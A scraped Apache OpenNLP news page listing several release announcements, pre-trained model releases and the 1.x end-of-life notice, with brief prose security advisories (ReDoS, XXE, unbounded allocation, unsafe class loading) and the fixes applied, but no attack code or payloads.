What’s new in Apache OpenNLP 2.5.12

This is a maintenance release on the 2.x line. It contains a security fix, bug fixes, performance improvements, and dependency updates.

Security Fixes

ReDoS / stack exhaustion in RegexNameFinderFactory built-in EMAIL and URL patterns (OPENNLP-1922, CVE-2026-82617)

The built-in EMAIL and URL patterns of RegexNameFinderFactory (DEFAULT_REGEX_NAME_FINDER) contained ambiguous nested quantifiers. Applications applying these finders to untrusted text could be driven into super-linear backtracking (EMAIL) or unbounded matcher recursion ending in a StackOverflowError (URL) by a small crafted input, denying service to the embedding application. Users of the built-in finders are recommended to upgrade.

What’s new in Apache OpenNLP 3.0.0-M6

This milestone release delivers 25 resolved issues. It extends the text analysis stack introduced in 3.0.0-M5 with new NLP capabilities, and includes security fixes, bug fixes, and dependency maintenance.

Security Fixes

Two security issues are addressed in this release.

ReDoS / stack exhaustion in RegexNameFinderFactory built-in EMAIL and URL patterns (OPENNLP-1922, CVE-2026-82617)

CWE-789 OOM DoS via Unbounded Array Allocation in SymSpellModelSerializer (OPENNLP-1899, CVE-2026-67211)

SymSpellModelSerializer read the unigram and bigram count fields of a binary SymSpell model and used them to pre-size maps, checking only that they were non-negative. A tiny crafted model file could therefore trigger a multi-gigabyte allocation and an OutOfMemoryError in any process loading SymSpell models from untrusted sources. Affected are 3.0.0-M4 and 3.0.0-M5, which ship the opennlp-spellcheck extension. Both counts are now bounded by AbstractModelReader.MAX_ENTRIES (default 10,000,000), which can be raised via the OPENNLP_MAX_ENTRIES system property if larger dictionaries are needed. Until upgrading, users should only load SymSpell models from trusted sources.

New Features and Improvements

A new pure-Java SentencePiece inference implementation produces exact original-text spans (OPENNLP-1885).
A new document annotation container provides typed, offset-anchored layers (OPENNLP-1888), with a document-scoped term vector layer on top of it (OPENNLP-1897).
Dictionary-based tokenization is now available for Japanese, Korean, and Chinese (OPENNLP-1894).
Stemming now supports Hunspell affix dictionaries (OPENNLP-1893).
A new Paragraph Normalizer handles Gutenberg-style and Markdown text (OPENNLP-1921). The Normalizer documentation has been improved, and misconfigured chains now fail loudly (OPENNLP-1916).
A general verified installer handles user-supplied third-party resources (OPENNLP-1909), and cached models are now verified against their SHA-512 checksum (OPENNLP-1902).
Performance: BeamSearch now uses chain nodes instead of per-candidate Sequence copies (OPENNLP-1903), and the sentence detector abbreviation veto is no longer quadratic in document length (OPENNLP-1906).

Apache OpenNLP 1.9.x has reached End of Life

The Apache OpenNLP team announces that the 1.9.x release line, and with it the whole 1.x series, has reached end of life. Apache OpenNLP 1.9.5, released in June 2026, is the final release of that line.

What this means

There will be no further 1.9.x releases.
No bug fixes, dependency updates or security fixes will be made for 1.9.x or any earlier version.
Issues can only be addressed on a supported release.

The supported release lines are the 2.x and 3.x series. The current releases of both are on our download page. See our security page for the version support policy.

Existing 1.x artifacts remain available from Maven Central and the Apache archive, but they are unmaintained and are not recommended for new or existing deployments.

Upgrading to a supported release

We encourage all users still on 1.x to upgrade. A few things to be aware of:

OpenNLP 1.9.x builds on Java 8. OpenNLP 2.5.x requires Java 17 or later, and OpenNLP 3.x requires Java 21 or later.
The org.apache.opennlp:opennlp-tools coordinates are unchanged in the 2.x line, so the dependency itself does not need to be replaced. In 3.x the project has been modularized and opennlp-runtime becomes the entry-point dependency. See the Maven and Gradle pages for the current coordinates.
Models trained with OpenNLP 1.x still load in 2.x and 3.x. New pre-trained models for a growing number of languages are available on our models page.

What’s new in Apache OpenNLP 3.0.0-M5

This milestone release delivers 33 resolved issues, headlined by a major overhaul of Unicode handling and text normalization. In addition, it brings security hardening, new NLP capabilities, and dependency maintenance.

Security Fixes

One security issue is addressed in this release.

CWE-502 Arbitrary Class Instantiation via XML Feature Generator Descriptor and Format Name in Apache OpenNLP (OPENNLP-1890, CVE-2026-63317)

OpenNLP contained three code paths that instantiated arbitrary classes by name without validation, letting attackers with control over model archives or format names trigger side effects from any classpath class’s constructor or static initializer. The fix enforces a package-prefix allowlist (defaulting to opennlp.*) before class loading; until upgrading, users should only load models and format names from trusted sources.

New Features and Improvements

The centerpiece of this release is a new Unicode-aware normalization and tokenization stack. A new normalization engine (CharClass, Dimension, and confusables support) is paired with an offset/alignment layer (Alignment, AlignedText) that correctly tracks character offsets through length-changing folds such as expansions and contractions.
On top of this, OpenNLP now ships a UAX #29 compliant word tokenizer (WordSegmenter, WordTokenizer, WordType), a layered Term model with TermAnalyzer, and a per-language NormalizationProfile registry.
Full Unicode case folding has been added to text normalization, whitespace handling is now aligned with the Unicode White_Space property, and the deep-learning components support offset-safe input normalization.
A new emoji annotation layer is wired into the Sentiment, Name Finder, and Doccat components, with offset-aware bidirectional emoji and emoticon expansion/contraction.
Performance and robustness also received attention: legacy CharSequenceNormalizers replace regex matching with cursor scans, Tag patterns are precompiled to avoid repeated compilation, and normalization/tokenization hot paths saw non-breaking performance improvements.
Stemmers are now thread-safe, with a new StemmerFactory and per-thread stem caching, and previously unexecuted stemmer tests have been brought back into the build.
Housekeeping updates include moving to Apache Parent 39, plus a fix to the binary distribution LICENSE to include the BSD section for the bundled stopword lists.
Documentation improvements cover the Entity Linker framework, the BioNLP converter, and a new Dev Manual section on Unicode normalization and the UAX #29 tokenizer.

IMPORTANT CHANGES

The ONNX input encoding in SentenceVectorsDL was fixed, which changes the produced sentence vectors. Any embeddings persisted with the old encoding are not comparable to the new output and must be re-generated. (OPENNLP-1836 - PR #1072)
WordpieceTokenizer (public API, used by opennlp-dl) now splits punctuation runs into single tokens, collapses partially-matched words to a single [UNK], and throws from tokenizePos instead of returning null. These change tokenization output for existing callers. (OPENNLP-1837 - PR #1073)
NameFinderDL now decodes all BIO entity types (PER/ORG/LOC/…) instead of only persons. Span.getType() now returns the entity label rather than the covered text, which is a contract change for existing callers. (OPENNLP-1846 - PR #1086)
The opennlp-dl components are now thread-safe; as part of this, loadVocab became public static (source- and binary-incompatible) and AbstractDL’s implicit no-arg constructor was removed. Both affect downstream code that calls loadVocab or extends AbstractDL. (OPENNLP-1844 - PR #1084)

XXE in `DictionaryEntryPersistor` (OPENNLP-1819, CVE-2026-40682)

The DictionaryEntryPersistor previously used a SAXParserFactory that did not enable secure processing or disable DTD handling, leaving external entity resolution active. A malicious dictionary file could exploit this for local file disclosure or SSRF before any dictionary entry was processed.

The parsing path is now aligned with the project’s existing XmlUtil helper, which properly sets FEATURE_SECURE_PROCESSING and disallow-doctype-decl.

Arbitrary Class Instantiation in `ExtensionLoader` (OPENNLP-1820, CVE-2026-42027)

ExtensionLoader.instantiateExtension() performed its isAssignableFrom type check after Class.forName() had already executed the target class’s static initializer, allowing a crafted model archive to trigger the static initializer of any class on the classpath.

The fix introduces a package-prefix allowlist consulted before Class.forName() is invoked:

Classes under opennlp.* remain permitted by default.
Other packages must be opted in via ExtensionLoader.registerAllowedPackage(String) or the OPENNLP_EXT_ALLOWED_PACKAGES system property (comma-separated list).

OOM via Unbounded Array Allocation in `AbstractModelReader` (OPENNLP-1821, CVE-2026-42440)

getOutcomes(), getOutcomePatterns(), and getPredicates() read attacker-controlled 32-bit count fields from binary model streams and passed them directly to array allocations. A crafted .bin file could trigger an immediate OutOfMemoryError and crash the JVM.

Each count is now bounded (default 10,000,000, configurable via -DOPENNLP_MAX_ENTRIES=<n>), with negative or oversized values failing fast via IllegalArgumentException.

Warning

For all three issues, users who cannot upgrade immediately should restrict input (dictionary and model files) to trusted sources only.

What’s new

The 3.x release line of Apache OpenNLP introduces no known breaking changes while significantly modularizing the project to improve library usage and future extensibility. The core API remains stable and fully compatible with 2.x, so existing projects can continue using the opennlp-tools artifact without modifications.

Migrating from 2.x to 3.x

The 3.x release line of Apache OpenNLP upgrades the compiler level to Java 21 and modularizes the project for better usage as a library and to support future extensibility. The core API remains stable and compatible with 2.x, but the project structure has been reorganized into multiple modules.

That means, that you can continue to use the previous opennlp-tools artifact as a dependency. However, we strongly recommend to switch to the new modular structure and import only the components you need, which will result in a smaller dependency footprint.

Only opennlp-runtime needs to be added as a dependency, and you can add additional modules (e.g. opennlp-ml-maxent, opennlp-models, etc.) as required by your project. For users of the traditional CLI toolkit, nothing changes with the 3.x release line. CLI usage remains stable

What’s changed?

New pre-trained sentence detection, tokenization, parts of speech tagging, and lemmatization models are now available for 4 languages:
- Afrikaans, Indonesian, Irish, and Persian.
The Czech models required a change in training, that is a different treebank: 'PDTC', see: https://github.com/UniversalDependencies/UD_Czech-PDTC/blob/master/README.md.

Details

All models, for a total of 36 languages, were trained with OpenNLP 2.5.4 based on the UD 2.16 release 2.16 and are intended to provide usable models under the Apache 2.0 license. These models will soon be available as JAR artifacts via Maven Central, or directly as binary files via our models page. OpenNLP Pre-trained Models 1.2 released

New pre-trained sentence detection, tokenization, parts of speech tagging, and lemmatization models for 9 languages are now available for:

Armenian, Basque, Catalan, Georgian, Greek, Kazakh, Korean, Icelandic, and Turkish.

The existing sentence detection, tokenization, and parts of speech tagging models for the 23 languages, published with the models release 1.1, have been re-trained. In addition, new lemmatization models have been trained and added, based on Universal Dependencies (UD) treebanks.

All models, for a total of 32 languages, were trained with OpenNLP 2.5.0 based on the UD release 2.15 and are intended to provide usable models under the Apache 2.0 license. These models will be available as JAR artifacts via Maven Central, or directly as binary files via our models page. What’s new in Apache OpenNLP 2.5.0

In total, this release tackles 62 issues and brings several dependency updates, bug fixes, substantial additions and some corrections for the API! OpenNLP version 2.5.0 supports thread-safe sentence detection, tokenization and POS-tagging (see: OPENNLP-936). With this release, there is the possibility to disable the POS tag mapper (see: OPENNLP-1600) to achieve a custom mapping.

Furthermore, it relies on opennlp-models in version 1.1 which got substantially extended by models for 18 new languages (see: OPENNLP-1615) as listed on the Model page. The OpenNLP Brat Annotator component has been moved to the OpenNLP sandbox repository due to limited quality and usability concerns (see: OPENNLP-1634). Thereby, several compile and runtime dependencies could be dropped (Jackson, Jersey, etc.) and are thus no longer shipped with the "bin" artifacts.

OpenNLP Pre-trained Models 1.1 released

New pre-trained sentence detection, tokenization, and parts of speech tagging models for 18 (Indo-European) languages are now available for:

Bulgarian, Czech, Croatian, Danish, Estonian, Finnish, Latvian, Norwegian, Polish, Portuguese, Romanian, Russian, Serbian, Slovak, Slovenian, Spanish, Swedish, and Ukrainian.

The existing sentence detection, tokenization, and parts of speech tagging models for these 5 languages:

Dutch, English, French, German, and Italian

were re-trained. The French models are now based on a GSD treebank, as the previously used FTB treebank is not maintained and has therefore been discontinued by the Universal Dependencies (UD) project.

All models were trained with OpenNLP 2.4.0 based on the UD release 2.14 and are intended to provide usable models under the Apache 2.0 license. These models are available as JAR artifacts via Maven Central, or directly as plain, binary files via our models page. What’s new in Apache OpenNLP 2.3.2

In this release we fixed several bugs and upgraded some dependencies. In addition, we added abbreviation dictionaries for several languages. Moreover, we addressed a memory issue (OPENNLP-421) which occurs for large dictionaries due to String interning. Several new configuration options have been added to choose a strategy. Details can be found in the related Jira / PR.

We switched the default onnx runtime dependency in opennlp-dl to the cpu variant. If you need to use the GPU accelerated version of onxx, you can use the newly added module opennlp-dl-gpu. Moreover, we fixed the CLI on the Windows plattform.

The Apache OpenNLP team is pleased to announce the release of Language Detector Model 1.8.3 for Apache OpenNLP 1.8.3. The Language Detector Model can detect 103 languages and outputs ISO 639-3 codes.

This is the first release of the Language Detector Model. It is compatible with Apache OpenNLP 1.8.3 or better.

It is important to note that this model is trained for and works well with longer texts that have at least two sentences or more from the same language.

Mitigation: All users who load models or XML dictionaries from untrusted sources should update to 1.8.2.

This release contains a couple of new features, improvements and bug fixes. The maxent trainer can now run in multiple threads to utilize multi-core CPUs, configurable feature generation was added to the name finder, the perceptron trainer was refactored and improved, machine learners can now be configured with much more options via a parameter file, evaluators can print out detailed evaluation information.

Additionally the release contains the following noteworthy changes:

Improved the white space handling in the Sentence Detector and its training code
Added more cross validator command line tools
Command line handling code has been refactored
Fixed problems with the new build
Now uses fast token class feature generation code by default
Added support for BioNLP/NLPBA 2004 shared task data
Removal of old and deprecated code
Dictionary case sensitivity support is now done properly
Support for OSGi
